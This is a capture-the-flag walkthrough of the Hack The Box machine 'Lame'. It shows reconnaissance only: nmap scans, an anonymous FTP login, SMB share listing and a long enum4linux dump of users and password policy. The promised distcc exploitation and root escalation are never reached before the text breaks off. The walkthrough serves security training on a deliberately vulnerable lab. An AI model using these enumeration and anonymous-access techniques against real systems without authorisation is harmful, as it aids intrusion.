Hack The Box: Lame Walkthrough

By December 5, 2017 Walkthrough

Information About Our Target

  • Hostname: Lame
  • IP Address: 10.10.10.3
  • Operating System Family: Linux

 

Abstract / Overview

This machine’s instance of distcc is vulnerable to a remote code execution attack using Metasploit. We will then leverage a suid nmap installation to escalate our privileges to root.

Information Gathering

Port Scan

1. Surface Scan

We begin with a quick scan of the top 1000 ports, leveraging only nmap’s banner grabbing script.

Output:


# Nmap 7.60 scan initiated Tue Dec 5 16:23:14 2017 as: nmap -sS -T4 -oA 01-tcp-top1k/top-1k --stats-every 60s --max-retries 3 --top-ports 1000 --script banner --reason 10.10.10.3
Nmap scan report for 10.10.10.3
Host is up, received echo-reply ttl 63 (0.019s latency).
Not shown: 996 filtered ports
Reason: 996 no-responses
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 63
|_banner: 220 (vsFTPd 2.3.4)
22/tcp open ssh syn-ack ttl 63
|_banner: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
139/tcp open netbios-ssn syn-ack ttl 63
445/tcp open microsoft-ds syn-ack ttl 63

# Nmap done at Tue Dec 5 16:23:34 2017 -- 1 IP address (1 host up) scanned in 20.24 seconds

We quickly find 4 open ports. They are the default ports for FTP (TCP 21), SSH (TCP 22), NetBIOS (TCP 139), and Microsoft Directory Service (TCP 445). We haven’t yet confirmed that any of the services yet in case of sneaky creator, but it’s likely that port 21 is actually FTP and port 22 is actually SSH per the banners we grabbed.

Not only this, but also seeing SSH should hint to us that we’re working with a *nix style system. Windows certainly can run SSH, but in my experience I primarily encounter remote desktop protocol (RDP / TCP 3389) on Windows machines.

2. Deep Scan

Since we have an idea of what the host is running, we can now run a more thorough scan of the host, checking all TCP ports. This is going to take longer to run, but will give us significantly more information to work with.


# Nmap 7.60 scan initiated Tue Dec 5 16:23:34 2017 as: nmap -sS -T4 -A -oA 02-tcp-full/full-tcp --stats-every 60s --max-retries 3 -p- --reason 10.10.10.3
Nmap scan report for 10.10.10.3
Host is up, received echo-reply ttl 63 (0.020s latency).
Not shown: 65530 filtered ports
Reason: 65530 no-responses
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63 vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.5
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh syn-ack ttl 63 OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd syn-ack ttl 63 distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Linux 2.6.23 (92%), Belkin N300 WAP (Linux 2.6.30) (92%), Control4 HC-300 home controller (92%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (92%), Dell Integrated Remote Access Controller (iDRAC5) (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Citrix XenServer 5.5 (Linux 2.6.18) (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:

| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)

| NetBIOS computer name:
| Workgroup: WORKGROUP\x00
|_ System time: 2017-12-05T16:27:00-05:00
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 19.99 ms 10.10.14.1
2 20.04 ms 10.10.10.3

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Dec 5 16:27:48 2017 — 1 IP address (1 host up) scanned in 254.08 seconds

This gives us a lot more information to work with and identifies one more port than we had seen before running distccd (TCP 3632).

Services

So based on this we know a lot more about the host and it appears to be running:

  • FTP (TCP 21)
  • SSH (TCP 22)
  • Samba (TCP 139/445)
  • distccd (TCP 3632)

So lets start off at the top with FTP:

FTP (TCP 21)

FTP is the file transfer protocol and is commonly used to send and retrieve files with a host. There a few things we want to check:

  • FTP Banner — Any text (if any) we get before the password prompt
  • Is anonymous login allowed? — This would allow us to place our own files on the remote host
FTP Banner and Anonymous Login

Luckily, we can collect both of these at once using the ncftp command. ncftp, compared to the standard ftp command, will print the banner out for us as well as attempt an anonymous login automatically. We can see this succeed below:


root@kali:~/Pentest/10.3-lame# ncftp 10.10.10.3
NcFTP 3.2.5 (Feb 02, 2011) by Mike Gleason (http://www.NcFTP.com/contact/).

Copyright (c) 1992-2011 by Mike Gleason.
All rights reserved.

Connecting to 10.10.10.3...
(vsFTPd 2.3.4)
Logging in...
Login successful.
Logged in to 10.10.10.3.
ncftp / >

Nice! We can login to the server anonymously. This could be useful. Before we move on, let’s take a quick look and see if there is anything exposed to us over FTP:


ncftp / > ls
ncftp / >

Rats, nothing. That sucks…but could be worse. Let’s do a quick search for vsFTPd 2.3.4 though and see if there is anything we might be able to use.

Hm, multiple exploits show up in our results This certainly could be useful for us. Let’s give it a quick shot and see if it works for us:

Exploit: https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor

No luck there for some reason. We can come back to it later though if we run out of other options.

SSH (TCP 22)

SSH is generally a pretty well tested and secure application. It’s not without it’s bugs, and sure it’s exploitable occasionally if there are misconfigurations or some kind of backdoor. But for now, we’re going to script this service and come back to it if we run out of other options.

Samba (TCP 139/445)

Samba is a stable and fast file and print service sharing service. Over the years, Samba and the SMB protocol in general has been riddled with vulnerabilities and bugs. Most recently at the time of writing this is the well known EternalBlue (MS17-010) exploit against Windows machines. Let’s collect some information about this instance of Samba.

First things first, lets see if anonymous login is allowed and if we can list the shares that Samba is exposing:


root@kali:~/Pentest/10.3-lame/01-recon/02-smb# smbclient -L 10.10.10.3

WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password:
Anonymous login successful

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

Server Comment
--------- -------

Workgroup Master
--------- -------
WORKGROUP LAME

OK, so we see that we might be able to access the tmp and opt shares. We should collect a bit more information before we try those though. Let’s use enum4linux to try to get more information:


root@kali:~/Pentest/10.3-lame/01-recon/02-smb# enum4linux -a 10.10.10.3

Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Dec 5 16:33:56 2017

==========================
| Target Information |
==========================
Target ........... 10.10.10.3
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

==================================================
| Enumerating Workgroup/Domain on 10.10.10.3 |
==================================================
[E] Can't find workgroup/domain

==========================================
| Nbtstat Information for 10.10.10.3 |
==========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
Looking up status of 10.10.10.3
No reply from 10.10.10.3

===================================
| Session Check on 10.10.10.3 |
===================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
[+] Server 10.10.10.3 allows sessions using username '', password ''
[+] Got domain/workgroup name:

=========================================
| Getting domain SID for 10.10.10.3 |
=========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 458.
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

====================================
| OS information on 10.10.10.3 |
====================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 467.
[+] Got OS info for 10.10.10.3 from smbclient:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
[+] Got OS info for 10.10.10.3 from srvinfo:
LAME Wk Sv PrQ Unx NT SNT lame server (Samba 3.0.20-Debian)
platform_id : 500
os version : 4.9
server type : 0x9a03

===========================
| Users on 10.10.10.3 |
===========================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.
index: 0x1 RID: 0x3f2 acb: 0x00000011 Account: games Name: games Desc: (null)
index: 0x2 RID: 0x1f5 acb: 0x00000011 Account: nobody Name: nobody Desc: (null)
index: 0x3 RID: 0x4ba acb: 0x00000011 Account: bind Name: (null) Desc: (null)
index: 0x4 RID: 0x402 acb: 0x00000011 Account: proxy Name: proxy Desc: (null)
index: 0x5 RID: 0x4b4 acb: 0x00000011 Account: syslog Name: (null) Desc: (null)
index: 0x6 RID: 0xbba acb: 0x00000010 Account: user Name: just a user,111,, Desc: (null)
index: 0x7 RID: 0x42a acb: 0x00000011 Account: www-data Name: www-data Desc: (null)
index: 0x8 RID: 0x3e8 acb: 0x00000011 Account: root Name: root Desc: (null)
index: 0x9 RID: 0x3fa acb: 0x00000011 Account: news Name: news Desc: (null)
index: 0xa RID: 0x4c0 acb: 0x00000011 Account: postgres Name: PostgreSQL administrator,,, Desc: (null)
index: 0xb RID: 0x3ec acb: 0x00000011 Account: bin Name: bin Desc: (null)
index: 0xc RID: 0x3f8 acb: 0x00000011 Account: mail Name: mail Desc: (null)
index: 0xd RID: 0x4c6 acb: 0x00000011 Account: distccd Name: (null) Desc: (null)
index: 0xe RID: 0x4ca acb: 0x00000011 Account: proftpd Name: (null) Desc: (null)
index: 0xf RID: 0x4b2 acb: 0x00000011 Account: dhcp Name: (null) Desc: (null)
index: 0x10 RID: 0x3ea acb: 0x00000011 Account: daemon Name: daemon Desc: (null)
index: 0x11 RID: 0x4b8 acb: 0x00000011 Account: sshd Name: (null) Desc: (null)
index: 0x12 RID: 0x3f4 acb: 0x00000011 Account: man Name: man Desc: (null)
index: 0x13 RID: 0x3f6 acb: 0x00000011 Account: lp Name: lp Desc: (null)
index: 0x14 RID: 0x4c2 acb: 0x00000011 Account: mysql Name: MySQL Server,,, Desc: (null)
index: 0x15 RID: 0x43a acb: 0x00000011 Account: gnats Name: Gnats Bug-Reporting System (admin) Desc: (null)
index: 0x16 RID: 0x4b0 acb: 0x00000011 Account: libuuid Name: (null) Desc: (null)
index: 0x17 RID: 0x42c acb: 0x00000011 Account: backup Name: backup Desc: (null)
index: 0x18 RID: 0xbb8 acb: 0x00000010 Account: msfadmin Name: msfadmin,,, Desc: (null)
index: 0x19 RID: 0x4c8 acb: 0x00000011 Account: telnetd Name: (null) Desc: (null)
index: 0x1a RID: 0x3ee acb: 0x00000011 Account: sys Name: sys Desc: (null)
index: 0x1b RID: 0x4b6 acb: 0x00000011 Account: klog Name: (null) Desc: (null)
index: 0x1c RID: 0x4bc acb: 0x00000011 Account: postfix Name: (null) Desc: (null)
index: 0x1d RID: 0xbbc acb: 0x00000011 Account: service Name: ,,, Desc: (null)
index: 0x1e RID: 0x434 acb: 0x00000011 Account: list Name: Mailing List Manager Desc: (null)
index: 0x1f RID: 0x436 acb: 0x00000011 Account: irc Name: ircd Desc: (null)
index: 0x20 RID: 0x4be acb: 0x00000011 Account: ftp Name: (null) Desc: (null)
index: 0x21 RID: 0x4c4 acb: 0x00000011 Account: tomcat55 Name: (null) Desc: (null)
index: 0x22 RID: 0x3f0 acb: 0x00000011 Account: sync Name: sync Desc: (null)
index: 0x23 RID: 0x3fc acb: 0x00000011 Account: uucp Name: uucp Desc: (null)

Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.
user:[games] rid:[0x3f2] user:[nobody] rid:[0x1f5] user:[bind] rid:[0x4ba] user:[proxy] rid:[0x402] user:[syslog] rid:[0x4b4] user:[user] rid:[0xbba] user:[www-data] rid:[0x42a] user:[root] rid:[0x3e8] user:[news] rid:[0x3fa] user:[postgres] rid:[0x4c0] user:[bin] rid:[0x3ec] user:[mail] rid:[0x3f8] user:[distccd] rid:[0x4c6] user:[proftpd] rid:[0x4ca] user:[dhcp] rid:[0x4b2] user:[daemon] rid:[0x3ea] user:[sshd] rid:[0x4b8] user:[man] rid:[0x3f4] user:[lp] rid:[0x3f6] user:[mysql] rid:[0x4c2] user:[gnats] rid:[0x43a] user:[libuuid] rid:[0x4b0] user:[backup] rid:[0x42c] user:[msfadmin] rid:[0xbb8] user:[telnetd] rid:[0x4c8] user:[sys] rid:[0x3ee] user:[klog] rid:[0x4b6] user:[postfix] rid:[0x4bc] user:[service] rid:[0xbbc] user:[list] rid:[0x434] user:[irc] rid:[0x436] user:[ftp] rid:[0x4be] user:[tomcat55] rid:[0x4c4] user:[sync] rid:[0x3f0] user:[uucp] rid:[0x3fc]

=======================================
| Share Enumeration on 10.10.10.3 |
=======================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
WARNING: The "syslog" option is deprecated

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.

Server Comment
--------- -------

Workgroup Master
--------- -------
WORKGROUP LAME

[+] Attempting to map shares on 10.10.10.3
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.3/print$ Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.3/tmp Mapping: OK, Listing: OK
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.3/opt Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.3/IPC$ [E] Can't understand response:
WARNING: The "syslog" option is deprecated
NT_STATUS_NETWORK_ACCESS_DENIED listing \*
//10.10.10.3/ADMIN$ Mapping: DENIED, Listing: N/A

==================================================
| Password Policy Information for 10.10.10.3 |
==================================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 501.

[+] Attaching to 10.10.10.3 using a NULL share

[+] Trying protocol 445/SMB...

[+] Found domain(s):

[+] LAME
[+] Builtin

[+] Password Info for Domain: LAME

[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000

[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0

[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set

Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 0

============================
| Groups on 10.10.10.3 |
============================

[+] Getting builtin groups:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.

[+] Getting builtin group memberships:

[+] Getting local groups:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 593.

[+] Getting local group memberships:

[+] Getting domain groups:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710.

[+] Getting domain group memberships:

=====================================================================
| Users on 10.10.10.3 via RID cycling (RIDS: 500-550,1000-1050) |
=====================================================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710.
[I] Found new SID: S-1-5-21-2446995257-2525374255-2673161615
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 742.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
[+] Enumerating users using SID S-1-5-21-2446995257-2525374255-2673161615 and logon username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-500 LAME\Administrator (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-501 LAME\nobody (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-502 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-503 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-504 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-505 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-506 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-507 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-508 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-509 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-510 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-511 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-512 LAME\Domain Admins (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-513 LAME\Domain Users (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-514 LAME\Domain Guests (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-515 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-516 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-517 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-518 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-519 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-520 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-521 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-522 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-523 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-524 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-525 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-526 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-527 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-528 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-529 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-530 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-531 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-532 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-533 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-534 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-535 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-536 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-537 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-538 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-539 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-540 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-541 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-542 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-543 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-544 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-545 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-546 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-547 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-548 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-549 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-550 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1000 LAME\root (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1001 LAME\root (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1002 LAME\daemon (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1003 LAME\daemon (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1004 LAME\bin (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1005 LAME\bin (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1006 LAME\sys (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1007 LAME\sys (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1008 LAME\sync (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1009 LAME\adm (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1010 LAME\games (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1011 LAME\tty (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1012 LAME\man (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1013 LAME\disk (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1014 LAME\lp (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1015 LAME\lp (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1016 LAME\mail (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1017 LAME\mail (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1018 LAME\news (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1019 LAME\news (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1020 LAME\uucp (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1021 LAME\uucp (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1022 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1023 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1024 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1025 LAME\man (Domain Group)
